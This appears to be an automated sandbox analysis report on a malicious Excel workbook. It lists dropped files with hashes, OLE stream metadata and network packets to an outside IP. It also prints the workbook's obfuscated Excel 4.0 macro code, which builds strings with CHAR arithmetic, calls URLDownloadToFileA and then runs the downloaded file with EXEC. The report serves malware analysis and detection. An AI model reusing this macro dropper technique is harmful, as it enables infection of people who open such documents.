                                              C:\Users\user\AppData\Local\Temp\CBEE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):315384
                                              Entropy (8bit):7.985566539937076
                                              Encrypted:false
                                              SSDEEP:6144:63ZrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+M8:6JFPM8R3AsB+bjej/9cr
                                              MD5:683A842A5EF5A7AD56668C8C6E28F0AF
                                              SHA1:41DA9ABB473DC73E6B83C74BBD21DED2CD8BE82C
                                              SHA-256:2A50B1A0C8059CD90E1178F720CDB23A35E8FD9E095A8FA5686AA25A5514BBEB
                                              SHA-512:DC5A4F04A1230F823877E9F390846C07E5F7447A26B1F66E37AD03688FE030B11B8A0ACD3E43740335E5685DFB42D266C53647D50DF4E73F034044B33865A6E4
                                              Malicious:false
                                              Reputation:low
                                              Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\CabF680.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58936
                                              Entropy (8bit):7.994797855729196
                                              Encrypted:true
                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                              Malicious:false
                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                              C:\Users\user\AppData\Local\Temp\TarF681.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):152533
                                              Entropy (8bit):6.31602258454967
                                              Encrypted:false
                                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                              Malicious:false
                                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 11:05:46 2020, atime=Sun Nov 29 11:05:46 2020, length=8192, window=hide
                                              Category:dropped
                                              Size (bytes):867
                                              Entropy (8bit):4.480331530545764
                                              Encrypted:false
                                              SSDEEP:12:85QwCLgXg/XAlCPCHaXtB8XzB/+x+UX+WnicvbJbDtZ3YilMMEpxRljKzqCTdJP8:85fU/XTd6jM0UYepDv3qm1rNru/
                                              MD5:4E39A731473CB1C8A51242AB81025055
                                              SHA1:2F2583A1D6846D4577A031E1D0DC67ECD7983B4A
                                              SHA-256:892F2A8AF95E56FD2902F256FA1A63B05715FE593AFCEA24E963CEE982E7C562
                                              SHA-512:0EACCED7A0C12014F47A2A90726070BBF75542B73425FA535C45E1C83C01B828AE06A2F2F5810EE1042F7A2EBC3DA65381BB18ED05BBDF7AE14374C573B4B421
                                              Malicious:false
                                              Preview: L..................F...........7G......G.......G.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Q.`..Desktop.d......QK.X}Q.`*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......980108..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1322008235.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Sun Nov 29 11:05:46 2020, atime=Sun Nov 29 11:05:46 2020, length=338432, window=hide
                                              Category:dropped
                                              Size (bytes):4236
                                              Entropy (8bit):4.519379497809528
                                              Encrypted:false
                                              SSDEEP:96:81M/XojFzGwRgQh21M/XojFzGwRgQh21M/XojFzGwRgQh21M/XojFzGwRgQ/:8jjF2QEjjF2QEjjF2QEjjF2Q/
                                              MD5:30D11FBF9050E20D67ABAE2657B0909B
                                              SHA1:8A158497E633C2D500E418F8493DF89B42730878
                                              SHA-256:E0364648AEE20510756C8B24CEA9BF2C907C3713B7D3AE00A35ED3ADA929FD62
                                              SHA-512:33BC2ECA514723E7103C8C64D1F8C947051F21A45BAF5DB95DA10B448909DAA91E343BE4E58B1EC1F33D1371C7DF1C6908E8DBCCE570EC0762100313DEDBA85F
                                              Malicious:false
                                              Preview: L..................F.... ....d..{......G...tl .G....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..,..}Q.` .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.3.2.2.0.0.8.2.3.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\document-1322008235.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.3.2.2.0.0.8.2.3.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......980108..........D_....3N.
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):232
                                              Entropy (8bit):4.659010171944146
                                              Encrypted:false
                                              SSDEEP:6:dj6Y9L+/L8EL+/LoY9L+/L8EL+/LoY9L+/L8EL+/LoY9L+/LI:dmF/LQ/LoF/LQ/LoF/LQ/LoF/LI
                                              MD5:8166004EAA80676A1A76C2D3E6355B58
                                              SHA1:87A231D939297C95F70F3F4434CFDC434369981E
                                              SHA-256:7260FDD0E6195A77CD8A31C8431805621390FEDE9533EEE9AD8DCBA3BD2806CC
                                              SHA-512:92C9B0B2D12F5965735BBD7CD372A1EB9FC1E2E10395CDD6F2EFDD7951F345CA3D67228537675408EAE099F1517D9485A249CC540B0B9DA365517FE80AD86386
                                              Malicious:false
                                              Preview: Desktop.LNK=0..[xls]..document-1322008235.LNK=0..document-1322008235.LNK=0..[xls]..document-1322008235.LNK=0..document-1322008235.LNK=0..[xls]..document-1322008235.LNK=0..document-1322008235.LNK=0..[xls]..document-1322008235.LNK=0..
                                              C:\Users\user\Desktop\BDEE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Category:dropped
                                              Size (bytes):398469
                                              Entropy (8bit):7.194969021117602
                                              Encrypted:false
                                              SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdx:cizo8RnsIROnr6n75YVPBN
                                              MD5:5D973DCFB9F0001EA4FDB8E2AAD2C4AE
                                              SHA1:D9C129C154AA7D9CAE2CE6A1131988FF77DCB2B4
                                              SHA-256:5EF5284543FEB761472AC4BF48E63C769020E786510EADFC59B9B49F7AC965D4
                                              SHA-512:8E9FECF0954A98ABF354B887F4B3A2A81169CF26F49C31F5EA6EA196B0AE81013D02E24EE6581B5200309507C4BB43B9E1863D9816224B614A45DBD716BADF84
                                              Malicious:false
                                              Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:48:42 2020, Security: 0
                                              Entropy (8bit):7.5234718640432785
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 78.94%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                              File name:document-1322008235.xls
                                              File size:338944
                                              MD5:59022091fba61b5021c8ab0c7c9b10e2
                                              SHA1:18b016bd5694b3255dec5d3e45668c4b6d299154
                                              SHA256:85a025f978905bee6b50f641abddb5a628702d90a6227b6c146ad4b8f096feeb
                                              SHA512:8d45d72c8d11141a7989822b8b5895b97504dec4622a3c353e4b23bb0d111eecd180fe0ff1d5266cda932eafe499fd94ed69c558dfb4df476a8d1ec6a773c75f
                                              SSDEEP:6144:QcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTw:4izo8RnsIROnr6n75Yh
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea286a4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "document-1322008235.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1251
                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16 00:00:00
                                              Last Saved Time:2020-11-26 09:48:42
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Document Code Page:1251
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504

                                              Streams

                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.367004077607
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.25260634675
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326317
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:326317
                                              Entropy:7.65589543371
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                              Macro 4.0 Code

                                              CALL("Ke"&????2!IE349&"32", "Cr"&????2!IG377&"yA", "JCJ", ????2!HV347&????2!HV362, 0)
                                              
                                              CALL("U"&????2!IG367, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HV347&????2!HV362&????2!HV376, 0, 0)
                                              
                                              =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!IE349&""32"",""Cr""&????2!IG377&""yA"",""JCJ"",????2!HV347&????2!HV362,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                              "=CALL(""Ke""&????2!IE349&""32"",""Cr""&????2!IG377&""yA"",""JCJ"",????2!HV347,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                              "=CALL(""U""&????2!IG367,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HV347&????2!HV362&????2!HV376,0,0)"=EXEC(????3!W36&????2!HV347&????2!HV362&????2!HV376)=HALT()

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2020 04:06:24.483731985 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:24.612756014 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:24.612931013 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:24.622982979 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:24.751986980 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:24.754892111 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:24.754921913 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:24.754940033 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:24.755017042 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:24.755091906 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:24.772661924 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:24.901946068 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:24.902149916 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:26.353785992 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:26.522602081 CET4434916767.212.179.162192.168.2.22
